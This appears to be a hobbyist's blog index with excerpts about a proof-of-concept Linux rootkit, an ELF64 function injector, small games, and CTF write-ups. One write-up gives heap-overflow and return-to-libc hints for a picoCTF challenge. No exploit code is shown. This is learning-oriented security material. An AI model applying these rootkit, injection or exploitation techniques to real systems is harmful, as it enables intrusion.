I have always wanted to dive a bit deeper into how to linux kernel internals work. To do this I figured a good starting point would be to create a small proof of concept rootkit! You can find the code for the rootkit on github https://github.com/jordan9001/superhide.
I made a fun tool in order to learn a bit more about linux elf64 headers. It will run an exported function from a shared library before running the original main function.
Right now, it requires the code to use dlopen and dlsym, so we can steal those references. We also do not support PIE binaries. To fix this, in the future I would not require dlopen and dlsym, but implement my own pseudo linker thing.
Either way, it was a great way to learn more about executables in linux. I was inspired by the post on 0x00sec by pico (https://0x00sec.org/t/elfun-file-injector/410).
I made a small game for this month’s project. It isn’t much to look at.
It was fun getting more comfortable with blender, and actually finishing a (very) small game. Hopefully more of this in the future!
Sorry the game is a bit tasteless. When I was a middle schooler, I played a flash game with a similar concept, and I thought it was the funniest idea in the world.
This past week me and my wife have been visiting my family in my home state, and my younger brothers and I took the opportunity to learn how to use Unity. We each made small 3D games giving us a good feel for working with Unity. Continue reading Starting with Unity
PicoCTF is a CTF “targeted at middle and high school students,” but I have always found them to be fun practice. This year (2017) especially, I thought the Binary Exploitation challenges were entertaining. This writeup will be about “Enter The Matrix,” in level 3.
The challenge description is:
This was a good challenge, involving a heap overflow and a return-to-libc attack. I implemented my exploit in golang, and you can see my source code at the bottom of this post.
If you are working on this problem, I will start with a few hints that don’t give everything away.
- Try playing with different non-symmetrical matrices.
- You can ssh into the machine that is running the challenge.
- gdb will give you incorrect libc offsets for outside of gdb.
- On that machine you can use “readelf -s /lib32/libc.so.6” to get function offsets for anything you need.
- Free is passed a pointer to data you control.
This year we got a group together to do AlexCTF. Most all the problems were fun, and overall I enjoyed the event.
Of the initial challenges released Friday, I had the most fun with the Reverse Engineering 3, Catalyst System challenge.
A quick aside about the two tools I used for this challenge; Radare2 and Z3. Radare2 is my favorite binary analysis or debugging tool. There is a bit of a learning curve, but it is powerful and open sourced! (Also, I love that no one knows how to say Radare, so you get all sorts of fun interpretations.) If you are still using gdb, I highly recommend taking the time to get to know it. Z3 is a high-performance theorem prover (it does the math I can’t be bothered with). Continue reading AlexCTF : Catalyst System WriteUp